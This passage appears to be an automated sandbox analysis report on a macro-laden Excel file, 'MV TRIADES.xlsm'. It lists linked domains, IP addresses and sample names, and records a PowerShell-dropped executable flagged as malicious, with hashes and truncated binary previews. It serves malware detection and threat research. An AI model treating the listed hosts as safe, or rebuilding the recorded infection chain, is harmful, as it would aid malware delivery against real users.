                                    • liverpoolsupporters9.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-E23ED3D9AC0156C980E7678E18BFFE6E.html
                                    Final Invoice.docGet hashmaliciousBrowse
                                    • liverpoolsupporters9.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-C3D2B2E00FD2D0A487EE9D3E4ED34E37.html
                                    198.54.116.63income.exeGet hashmaliciousBrowse
                                      2vWeR8OLTD.exeGet hashmaliciousBrowse
                                        BomboFile.exeGet hashmaliciousBrowse
                                          iRBtfxsY9Z.exeGet hashmaliciousBrowse
                                            847819930299338189289.exeGet hashmaliciousBrowse
                                              37Security Deposit_PDF.jsGet hashmaliciousBrowse

                                                Domains

                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                liverpoolsupporters9.comIMG_1024_363_17.pdf.exeGet hashmaliciousBrowse
                                                • 104.21.88.100
                                                income.exeGet hashmaliciousBrowse
                                                • 172.67.176.78
                                                IMG_50_70_66301.docGet hashmaliciousBrowse
                                                • 104.21.88.100
                                                IMG_251_45_013.docGet hashmaliciousBrowse
                                                • 172.67.176.78
                                                IMG_501_76_1775.docGet hashmaliciousBrowse
                                                • 104.21.88.100
                                                RFQ.scr.exeGet hashmaliciousBrowse
                                                • 172.67.176.78
                                                PO350KW30021.exeGet hashmaliciousBrowse
                                                • 172.67.176.78
                                                mj8ejPVt3a.exeGet hashmaliciousBrowse
                                                • 172.67.176.78
                                                Po # 6-10331.exeGet hashmaliciousBrowse
                                                • 172.67.176.78
                                                4849708PO # RMS0001.exeGet hashmaliciousBrowse
                                                • 172.67.176.78
                                                MACHINE SPECIFICATION.exeGet hashmaliciousBrowse
                                                • 104.21.88.100
                                                Drawings_pdf.exeGet hashmaliciousBrowse
                                                • 172.67.176.78
                                                ORDER 71902.docGet hashmaliciousBrowse
                                                • 172.67.176.78
                                                JVMkQyfuM8.exeGet hashmaliciousBrowse
                                                • 104.21.88.100
                                                Final Invoice.docGet hashmaliciousBrowse
                                                • 172.67.176.78
                                                smtp.jiratane.comincome.exeGet hashmaliciousBrowse
                                                • 198.54.116.63
                                                2vWeR8OLTD.exeGet hashmaliciousBrowse
                                                • 198.54.116.63

                                                ASN

                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                CLOUDFLARENETUSSecuriteInfo.com.Trojan.Siggen12.46475.27996.exeGet hashmaliciousBrowse
                                                • 172.67.162.110
                                                IMG_1024_363_17.pdf.exeGet hashmaliciousBrowse
                                                • 172.67.188.154
                                                income.exeGet hashmaliciousBrowse
                                                • 172.67.176.78
                                                IMG_50_70_66301.docGet hashmaliciousBrowse
                                                • 172.67.176.78
                                                IMG_251_45_013.docGet hashmaliciousBrowse
                                                • 104.21.19.200
                                                Requirements.docGet hashmaliciousBrowse
                                                • 104.21.45.223
                                                IMG_501_76_1775.docGet hashmaliciousBrowse
                                                • 172.67.176.78
                                                NEW ORDER.exeGet hashmaliciousBrowse
                                                • 172.67.188.154
                                                RFQ.scr.exeGet hashmaliciousBrowse
                                                • 172.67.176.78
                                                swift copy.exeGet hashmaliciousBrowse
                                                • 172.67.188.154
                                                SWIFT COPY_PDF.exeGet hashmaliciousBrowse
                                                • 172.67.161.235
                                                PO350KW30021.exeGet hashmaliciousBrowse
                                                • 172.67.176.78
                                                n64QPFbX1S.dllGet hashmaliciousBrowse
                                                • 104.20.185.68
                                                IcedID.dllGet hashmaliciousBrowse
                                                • 104.20.185.68
                                                Lifebloom-Purchase Order InquirySIBER210318(WB TAPE&YARN)#020221KA-.htmlGet hashmaliciousBrowse
                                                • 104.18.70.113
                                                Purchase Order.xlsGet hashmaliciousBrowse
                                                • 172.67.219.133
                                                Purchase Order.xlsGet hashmaliciousBrowse
                                                • 172.67.219.133
                                                9311-32400.pdf.exeGet hashmaliciousBrowse
                                                • 104.21.42.218
                                                ab76e3ddfecc8c84fd2179bb40cbe1c535963154c3e6e.exeGet hashmaliciousBrowse
                                                • 104.23.99.190
                                                mj8ejPVt3a.exeGet hashmaliciousBrowse
                                                • 172.67.176.78
                                                AS-26496-GO-DADDY-COM-LLCUSSWIFT COPY_PDF.exeGet hashmaliciousBrowse
                                                • 107.180.4.11
                                                shippingdoc_pdf.exeGet hashmaliciousBrowse
                                                • 184.168.131.241
                                                OC CVE9362 _TVOP-MIO 22(C) 2021,pdf.exeGet hashmaliciousBrowse
                                                • 184.168.131.241
                                                Po # 6-10331.exeGet hashmaliciousBrowse
                                                • 184.168.131.241
                                                KI985JJ3dtaZtda.exeGet hashmaliciousBrowse
                                                • 184.168.131.241
                                                NEW ORDER_PDF.exeGet hashmaliciousBrowse
                                                • 184.168.131.241
                                                ZchEM36552.dllGet hashmaliciousBrowse
                                                • 107.180.90.10
                                                Purcahse_Order_3222021.exeGet hashmaliciousBrowse
                                                • 107.180.26.185
                                                swift_Telex.exeGet hashmaliciousBrowse
                                                • 107.180.26.185
                                                yLmDpCx1xp.dllGet hashmaliciousBrowse
                                                • 107.180.90.10
                                                dnW1mfW27L.dllGet hashmaliciousBrowse
                                                • 107.180.90.10
                                                NXpoHPqfh0.exeGet hashmaliciousBrowse
                                                • 107.180.2.30
                                                Rz9fvf4OTb.exeGet hashmaliciousBrowse
                                                • 184.168.131.241
                                                K0or0EZubp.dllGet hashmaliciousBrowse
                                                • 107.180.90.10
                                                Doc.exeGet hashmaliciousBrowse
                                                • 184.168.131.241
                                                TQPHHyjqoJdMHyp.exeGet hashmaliciousBrowse
                                                • 107.180.54.183
                                                z2xQEFs54b.exeGet hashmaliciousBrowse
                                                • 184.168.131.241
                                                FEB SOA.exeGet hashmaliciousBrowse
                                                • 148.66.138.106
                                                MJUsJ8rw4V.dllGet hashmaliciousBrowse
                                                • 107.180.90.10
                                                1W2Ih2UesO.exeGet hashmaliciousBrowse
                                                • 107.180.104.65
                                                NAMECHEAP-NETUSincome.exeGet hashmaliciousBrowse
                                                • 198.54.116.63
                                                IMG_50_70_66301.docGet hashmaliciousBrowse
                                                • 162.213.253.52
                                                ORDER.exeGet hashmaliciousBrowse
                                                • 199.193.7.228
                                                Purchase Order-877.exeGet hashmaliciousBrowse
                                                • 199.188.200.10
                                                SecuriteInfo.com.Trojan.MulDrop16.33902.6810.exeGet hashmaliciousBrowse
                                                • 198.54.122.60
                                                SecuriteInfo.com.Trojan.MulDrop16.33902.452.exeGet hashmaliciousBrowse
                                                • 198.54.122.60
                                                SecuriteInfo.com.Trojan.PackedNET.594.3012.exeGet hashmaliciousBrowse
                                                • 198.54.122.60
                                                PO_4500515522_20210317_060435_10010533.xlsxGet hashmaliciousBrowse
                                                • 199.193.7.228
                                                MACHINE SPECIFICATION.exeGet hashmaliciousBrowse
                                                • 198.54.117.215
                                                2vWeR8OLTD.exeGet hashmaliciousBrowse
                                                • 198.54.116.63
                                                INQUIRY for IB Series 20-24 cavities .docGet hashmaliciousBrowse
                                                • 198.54.122.60
                                                Inquiry from SYRABIA LIMITED.docGet hashmaliciousBrowse
                                                • 198.54.122.60
                                                Purchase Order P.O-213-032021.docGet hashmaliciousBrowse
                                                • 198.54.122.60
                                                qzinl7qkwD.exeGet hashmaliciousBrowse
                                                • 198.54.117.199
                                                qzinl7qkwD.exeGet hashmaliciousBrowse
                                                • 198.54.117.199
                                                SecuriteInfo.com.Trojan.PackedNET.591.17594.exeGet hashmaliciousBrowse
                                                • 199.193.7.228
                                                Purchase Order19321.docGet hashmaliciousBrowse
                                                • 162.0.235.23
                                                PO_4500515522_20210317_060435_10010533.xlsxGet hashmaliciousBrowse
                                                • 199.193.7.228
                                                Purchase Order19320.docGet hashmaliciousBrowse
                                                • 162.0.235.23
                                                RFQ00787676545654300RITEC.docGet hashmaliciousBrowse
                                                • 198.54.117.217

                                                JA3 Fingerprints

                                                No context

                                                Dropped Files

                                                No context

                                                Created / dropped Files

                                                C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                                                Process:C:\Users\user\AppData\Roaming\tNDFx.exe
                                                File Type:Microsoft Cabinet archive data, 58596 bytes, 1 file
                                                Category:dropped
                                                Size (bytes):58596
                                                Entropy (8bit):7.995478615012125
                                                Encrypted:true
                                                SSDEEP:1536:J7r25qSSheImS2zyCvg3nB/QPsBbgwYkGrLMQ:F2qSSwIm1m/QEBbgb1oQ
                                                MD5:61A03D15CF62612F50B74867090DBE79
                                                SHA1:15228F34067B4B107E917BEBAF17CC7C3C1280A8
                                                SHA-256:F9E23DC21553DAA34C6EB778CD262831E466CE794F4BEA48150E8D70D3E6AF6D
                                                SHA-512:5FECE89CCBBF994E4F1E3EF89A502F25A72F359D445C034682758D26F01D9F3AA20A43010B9A87F2687DA7BA201476922AA46D4906D442D56EB59B2B881259D3
                                                Malicious:false
                                                Reputation:high, very likely benign file
                                                Preview: MSCF............,...................I........T........bR. .authroot.stl...s~.4..CK..8T....c_.d....A.K......&.-.J...."Y...$E.KB..D...D.....3.n..u.............|..=H4..c&.......f.,..=..-....p2.:..`HX......b.......Di.a......M.....4.....i..}..:~N.<..>.*.V..CX......B......,.q.M.....HB..E~Q...)..Gax../..}7..f......O0...x..k..ha...y.K.0.h..(....{2Y.].g...yw..|0.+?.`-../.xvy..e......w.+^...w|.Q.k.9&.Q.EzS.f......>?w.G.......v.F......A......-P.$.Y...u....Z..g..>.0&.y.(..<.].`>... ..R.q...g.Y..s.y.B..B....Z.4.<?.R....1.8.<.=.8..[a.s.......add..).NtX....r....R.&W4.5]....k.._iK..xzW.w.M.>,5.}..}.tLX5Ls3_..).!..X.~...%.B.....YS9m.,.....BV`.Cee.....?......:.x-.q9j...Yps..W...1.A<.X.O....7.ei..a\.~=X....HN.#....h,....y...\.br.8.y"k).....~B..v....GR.g|.z..+.D8.m..F .h...*.........ItNs.\....s..,.f`D...]..k...:9..lk.<D....u...........[...*.wY.O....P?.U.l....Fc.ObLq......Fvk..G9.8..!..\T:K`.......'.3......;.u..h...uD..^.bS...r........j..j .=...s .FxV....g.c.s..9.
                                                C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                                Process:C:\Users\user\AppData\Roaming\tNDFx.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):326
                                                Entropy (8bit):3.1292511123011737
                                                Encrypted:false
                                                SSDEEP:6:kKchkwTJ0N+SkQlPlEGYRMY9z+4KlDA3RUe0ht:SkwTJrkPlE99SNxAhUe0ht
                                                MD5:4955CCE9CFBC6D1A47439BF94F0156BB
                                                SHA1:C4B6AA6E04492A480C64B69B160D07EC1F129223
                                                SHA-256:B7DD856AD1BA10864E22A032FE8933ADF976944F39EF59B0083A9DB138276D46
                                                SHA-512:FF12AE467AB5CF3771F674246E03CA1ED9F7715923411A081883426314F57004241C0E689728BA56361446AD206DEC40E7803CAABBC3AB467120871182CDC074
                                                Malicious:false
                                                Reputation:low
                                                Preview: p...... .........A..k...(....................................................... ...................$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.d.8.f.4.f.3.f.6.f.d.7.1.:.0."...
                                                C:\Users\user\AppData\Local\ConsoleApp1\tNDFx.exe_Url_1w40bkugt4lbn414pfn202m3aujsqqra\7.926.901.773\qf3mddhz.newcfg
                                                Process:C:\Users\user\AppData\Roaming\tNDFx.exe
                                                File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                Category:modified
                                                Size (bytes):986519
                                                Entropy (8bit):3.1100391617947
                                                Encrypted:false
                                                SSDEEP:12288:Kd6neAu0wje1N9hy3n/h7bE8Ht1C0q9MmwDbPZBOI8JPJHLPwOFdWrTYC36Kiglh:Ewm2/C3yIm85KS
                                                MD5:7837C874BCAD1A0F326C0780C17C9635
                                                SHA1:FE07D87459BC80E10204131F0CDC58C8AEF20F26
                                                SHA-256:2C6CF4BB5FF992E99CA0C27E00DE168117425EE41C15D40E05BDF082387C7916
                                                SHA-512:0D6043A2E5EBC81D1D6B20DD5866077FB656843426090FEB81323072129803B0D7B5CB5090FF94FD430DD8E9989C4FB517D51400DA7CC4876EC07456086456CB
                                                Malicious:false
                                                Reputation:low
                                                Preview: <?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <sectionGroup name="userSettings" type="System.Configuration.UserSettingsGroup, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" >.. <section name="XJsMDredQitBteUFpCkVIptAzENRZSlAHGRebGOZFvUFSXIjN.DHzRxafGuhgYQncSIkaSNopzGCsXZsijENdUfVsMQ" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" allowExeDefinition="MachineToLocalUser" requirePermission="false" />.. </sectionGroup>.. </configSections>.. <userSettings>.. <XJsMDredQitBteUFpCkVIptAzENRZSlAHGRebGOZFvUFSXIjN.DHzRxafGuhgYQncSIkaSNopzGCsXZsijENdUfVsMQ>.. <setting name="LfKbKERaNoRoandKkMhQHNrlxYKrbTSoxaOjdkupFfqypo".. serializeAs="String">.. <value>77 90 144 0 3 0 0 0 4 0 0 0 255 255 0 0 184 0 0 0 0 0 0 0 64 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\625B6235.jpg
                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                File Type:PNG image data, 1243 x 610, 8-bit/color RGBA, non-interlaced
                                                Category:dropped
                                                Size (bytes):405384
                                                Entropy (8bit):7.987375037036153
                                                Encrypted:false
                                                SSDEEP:12288:349w8fyunGthwu8kxPthZugvq4jzjSGUuV:349b7AhFxPthZnvL3tV
                                                MD5:5C38192171779B0CC053C4CD48D80DB6
                                                SHA1:5EC3E8D686AE4BC54AFBFF7E32B39F4C3C8AEED8
                                                SHA-256:BF72C8EF884B5851EA5B7D6C9336188A442D4AAA9C006CD417C241BCAF98EA0C
                                                SHA-512:68EBE5C97C9E21FC304F0954DCA0BA03A0B10099E0390FCE80686646F0C2CD63319F692650607807C1299DF20DFBA99F7AAF99546B4399EC2026FF9DAD951032
                                                Malicious:false
                                                Preview: .PNG........IHDR.......b........V....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...c]..=......y......^..6I%.;m.@=.I....)R\/~q..]...wh.R....5..9..).......g...g.Y{f...v.@t.P..)..(*@:.R...}.^....E?.PY_.rmy.d.1.l..;...{O...z.....T..{.a!.Y~...;.r.Af..d....k_9.....*.....p....J_..P...J.&T...2...d.w..C....ei_....Y.[..?.........f>2....D.m..|..{...+B..4.Z..'...=.....k...v..l.-...H..G.3-O...mZ...i.....y..:.f.>TL}h.u.Ny....T.Y.G.,"^..P..Z.{....Kxz#Po._.....v..Z/..$...../C.Gr,..,v.....6.......9]c.....Lz....n.hk.o!...E......<.............F...6.>c;.Y...w..........5.........m..M..M'..F....m.;a.X.A..?...U.o....|....>.c...gkW.N.}F..6.5ie..Z6...%...?..c.|.>.j........OA.UP....d.Vj.4Aee..........?.X[.7a.O..=.0q.9N_.}../6...kc..9...k...r.*&d....9.6..D.,.h.z...9.p..-...E.L..V.DX.r.B.a&...@(.....#B.[....!*..yH#.+.X.".3OaH..Y.[....g.0....ci.t`...r.9Z{..!..J.........".:..l...".x...3.>.....X7....E..!.c...G.r.^#4..m..g....a....&.s.....A$p..
                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FEF21AB2.png
                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                File Type:PNG image data, 225 x 225, 8-bit colormap, non-interlaced
                                                Category:dropped
                                                Size (bytes):959
                                                Entropy (8bit):7.35380703026024
                                                Encrypted:false
                                                SSDEEP:24:KmW3yzBdr1zIOJWauDsUlCGa8QvoXD0jhUp9+11:4Gbr1Dsozb8QwWMc11
                                                MD5:56B608676A1D434E9057266A871DFAA8
                                                SHA1:587F06D07126A801104B9C1935017A2EDD0EA720
                                                SHA-256:579803A34DCCBD974C0F2AF5250550524CD5242D5449A6E6C079E8F4F7FAF103
                                                SHA-512:07F13C6AABA874C0BE4C61FD4D0F596DADF08169F4369937B3D61684E442E7BC5930651A5CF92DCBFE54BCFF48BAB781E922EC6EF9A64B37E63BCF5B4E8AA1E9
                                                Malicious:false
                                                Preview: .PNG........IHDR..............m"H...-PLTE......aaa............................???KKK.......MIDATx....0....g.....]..c.:Ha.....0.\.2.....1.u...8.i....\'..>......^...8./....|...8..u....6.....Yp..g..X.XR...........GYq.o....e[0~...X=..+&Bo......^q#....*nfb.b..{..+.X0.OBo.....O(.Zqg&4...+..8..Z0..2.Z1...L.V..PO,.c.S.FX.p.-.........3......[.......OfB.1..3........V,...k....xJ...'..X0../.(.z...W[P.b.Lh.G.B&4..QyA.....z.X%..~....b...fB.'..Co......Wl..M.h4..m4./(.\..B......*..B.Pl.b.LhZD.i.-...uA...]2....N.......z+.XP..b..[.c.-5..=......zK..;[P(...LhJF.M&4..rA..N....(....w.z...;..l4..r.......6...h8.&7.A...V........[...y.-G.."..c...z...\P.b.Lh.F#T&4...vAa.......,..g...z.v..fB......<N.....V...M:..3.IEc.....P.......?@.-..?L&4_..$.....tA..eB#.x.}De^/o.?r..l|..G..o._...46|..C.1..C.1..C.1..C.1..C.1..C.1..C.1..C.1..C.1..C.1..C.1..C.1..C.1..C.1..C.1..C.1..C.1..C.1..C.1..C.1..C.1..C.1..C.1..C.1.......T.n[..]....IEND.B`.
                                                C:\Users\user\AppData\Local\Temp\Cab9934.tmp
                                                Process:C:\Users\user\AppData\Roaming\tNDFx.exe
                                                File Type:Microsoft Cabinet archive data, 58596 bytes, 1 file
                                                Category:dropped
                                                Size (bytes):58596
                                                Entropy (8bit):7.995478615012125
                                                Encrypted:true
                                                SSDEEP:1536:J7r25qSSheImS2zyCvg3nB/QPsBbgwYkGrLMQ:F2qSSwIm1m/QEBbgb1oQ
                                                MD5:61A03D15CF62612F50B74867090DBE79
                                                SHA1:15228F34067B4B107E917BEBAF17CC7C3C1280A8
                                                SHA-256:F9E23DC21553DAA34C6EB778CD262831E466CE794F4BEA48150E8D70D3E6AF6D
                                                SHA-512:5FECE89CCBBF994E4F1E3EF89A502F25A72F359D445C034682758D26F01D9F3AA20A43010B9A87F2687DA7BA201476922AA46D4906D442D56EB59B2B881259D3
                                                Malicious:false
                                                Preview: MSCF............,...................I........T........bR. .authroot.stl...s~.4..CK..8T....c_.d....A.K......&.-.J...."Y...$E.KB..D...D.....3.n..u.............|..=H4..c&.......f.,..=..-....p2.:..`HX......b.......Di.a......M.....4.....i..}..:~N.<..>.*.V..CX......B......,.q.M.....HB..E~Q...)..Gax../..}7..f......O0...x..k..ha...y.K.0.h..(....{2Y.].g...yw..|0.+?.`-../.xvy..e......w.+^...w|.Q.k.9&.Q.EzS.f......>?w.G.......v.F......A......-P.$.Y...u....Z..g..>.0&.y.(..<.].`>... ..R.q...g.Y..s.y.B..B....Z.4.<?.R....1.8.<.=.8..[a.s.......add..).NtX....r....R.&W4.5]....k.._iK..xzW.w.M.>,5.}..}.tLX5Ls3_..).!..X.~...%.B.....YS9m.,.....BV`.Cee.....?......:.x-.q9j...Yps..W...1.A<.X.O....7.ei..a\.~=X....HN.#....h,....y...\.br.8.y"k).....~B..v....GR.g|.z..+.D8.m..F .h...*.........ItNs.\....s..,.f`D...]..k...:9..lk.<D....u...........[...*.wY.O....P?.U.l....Fc.ObLq......Fvk..G9.8..!..\T:K`.......'.3......;.u..h...uD..^.bS...r........j..j .=...s .FxV....g.c.s..9.
                                                C:\Users\user\AppData\Local\Temp\Tar9935.tmp
                                                Process:C:\Users\user\AppData\Roaming\tNDFx.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):152788
                                                Entropy (8bit):6.309740459389463
                                                Encrypted:false
                                                SSDEEP:1536:TIz6c7xcjgCyrYBZ5pimp4Ydm6Caku2Dnsz0JD8reJgMnl3rlMGGv:TNqccCymfdmoku2DMykMnNGG0
                                                MD5:4E0487E929ADBBA279FD752E7FB9A5C4
                                                SHA1:2497E03F42D2CBB4F4989E87E541B5BB27643536
                                                SHA-256:AE781E4F9625949F7B8A9445B8901958ADECE7E3B95AF344E2FCB24FE989EEB7
                                                SHA-512:787CBC262570A4FA23FD9C2BA6DA7B0D17609C67C3FD568246F9BEF2A138FA4EBCE2D76D7FD06C3C342B11D6D9BCD875D88C3DC450AE41441B6085B2E5D48C5A
                                                Malicious:false
                                                Preview: 0..T...*.H.........T.0..T....1.0...`.H.e......0..D...+.....7.....D.0..D.0...+.....7..........|h....210303062855Z0...+......0..D.0..*.....`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o
                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6SFY2ZDAX72H3NDC9G39.temp
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):8016
                                                Entropy (8bit):3.59046692240568
                                                Encrypted:false
                                                SSDEEP:96:chQCsMqZqvsqvJCwo1z8hQCsMqZqvsEHyqvJCworbzv1YyHmQhOZlUV/Iu:cywo1z8yMHnorbzvYQhOSIu
                                                MD5:3B3B1714DCD8B8988FC2C80DC784C02F
                                                SHA1:05D3A860E5319CBF9FBDE9010E9DDBF48AC6DBAE
                                                SHA-256:716F2D54E088BCE4FBD19DEB092DFA2E2CCFF11B0A565AAEDB0A443F612259D5
                                                SHA-512:C5E90F7603BB6BDFA7D5898D9C7093C93E88F5ED4BBAF9888B36DCE72C8FC21EBEF3C9978F91E74890AEDA4A185AE7FF78EB4C710709DA10617B9CF647703684
                                                Malicious:false
                                                Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                C:\Users\user\AppData\Roaming\tNDFx.exe
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):69736
                                                Entropy (8bit):5.5447144009894265
                                                Encrypted:false
                                                SSDEEP:768:Ui0upenX9w1hHAWyGiqIoZphnxfsmnOYOSLCGflvsGflvx/FIwJGun51oGflvx/+:U1upa21hFyGiqI0jxfsRw0
                                                MD5:B2AB5D8639C89D42ACBDC362B86ACA91
                                                SHA1:84A55E89E1B5731A0DC1E8475E148B7C3EBB8B01
                                                SHA-256:7A8E27F4732DE792D7904A347061EFD90E892A954206ADB676FE8B8A914CA3FA
                                                SHA-512:F7B0C0221812EF3CDEE347125236EB7B430305BC904ABA40CE49EFC921664DD776D4B371649045ED31C062E7FC41391740B217FC3FC2C9F55B41168C6F94B630
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 28%
                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....N............"...0.............N.... ... ....@.. .......................`............@.....................................K.... ..................h....@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H........s..\............................................................*".(.....*R.(.......s....}....*6.(~...o%....*>..r.L.p.o0....*".(1....*Vs....(2...t.........*~r...pzr...pzr...pzr...pzr...pz*.r...pzr...pzr...pzr...pzr...pzr...pzr...pzr...pz*.r...pzr...pzr...pzr...pzr...pzr...pzr...pz*.r...pzr...pzr...pzr...pzr...pzr...pzr...pzr...pzr...pz*.r...pzr...pzr...pzr...pzr...pzr...pzr...pzr...pzr...pzr...pz*....0..........r...pzr...pzr...pzr...pzr...pzr...pzr...pzr...pzr...pzr.
                                                C:\Users\user\Desktop\~$MV TRIADES.xlsm
                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):165
                                                Entropy (8bit):1.4377382811115937
                                                Encrypted:false
                                                SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                                                MD5:797869BB881CFBCDAC2064F92B26E46F
                                                SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                                                SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                                                SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                                                Malicious:true
                                                Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                Static File Info

                                                General

                                                File type:Microsoft Excel 2007+
                                                Entropy (8bit):7.980392459837041
                                                TrID:
                                                • Excel Microsoft Office Open XML Format document with Macro (57504/1) 54.50%
                                                • Excel Microsoft Office Open XML Format document (40004/1) 37.92%
                                                • ZIP compressed archive (8000/1) 7.58%
                                                File name:MV TRIADES.xlsm
                                                File size:430221
                                                MD5:f7f66672f19f2dabe4f7269e32eb8540
                                                SHA1:688ba6fb074142755fecd74056278b145a282f5a
                                                SHA256:9664740123170b912430759af6cfad9ff784ccd266fe93909022093beff051c7
                                                SHA512:b6a3f0df23c731b57ec21ed74bba187a46f49fb35c35a089417b17cc2dc1fed3b4dba04584b1ccb26df7fb7e29459a268c25d4d0df918b9eb0a319303aff360e
                                                SSDEEP:12288:Y49w8fyunGthwu8kxPthZugvq4jzjSGUuiG:Y49b7AhFxPthZnvL3t/
                                                File Content Preview:PK..........!...'.............[Content_Types].xml ...(.........................................................................................................................................................................................................

                                                File Icon

                                                Icon Hash:e4e2aa8aa4bcbcac

                                                Static OLE Info

                                                General

                                                Document Type:OpenXML
                                                Number of OLE Files:1

                                                OLE File "/opt/package/joesandbox/database/analysis/372951/sample/MV TRIADES.xlsm"

                                                Indicators

                                                Has Summary Info:False
                                                Application Name:unknown
                                                Encrypted Document:False
                                                Contains Word Document Stream:
                                                Contains Workbook/Book Stream:
                                                Contains PowerPoint Document Stream:
                                                Contains Visio Document Stream:
                                                Contains ObjectPool Stream:
                                                Flash Objects Count:
                                                Contains VBA Macros:True

                                                Summary

                                                Author:BOOLOO
                                                Last Saved By:BOOLOO
                                                Create Time:2021-03-17T12:53:17Z
                                                Last Saved Time:2021-03-21T07:13:49Z
                                                Creating Application:Microsoft Excel
                                                Security:0

                                                Document Summary

                                                Thumbnail Scaling Desired:false
                                                Company:
                                                Contains Dirty Links:false
                                                Shared Document:false
                                                Changed Hyperlinks:false
                                                Application Version:16.0300

                                                Streams with VBA

                                                VBA File Name: Sheet1.cls, Stream Size: 1180
                                                General
                                                Stream Path:VBA/Sheet1
                                                VBA File Name:Sheet1.cls
                                                Stream Size:1180
                                                Data ASCII:. . . . . . . . . Z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . J . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . p . . . . . . . ! c L i 1 F . . . . . N . . . . . . . . . . . . . . . . F . . . . . . . . . . . . . . . . . . . . ! j 6 . W ` w E . . . B . l . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . ! j 6 . W ` w E . . . B . l . . . . ! c L i 1 F . . . . . N . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . .
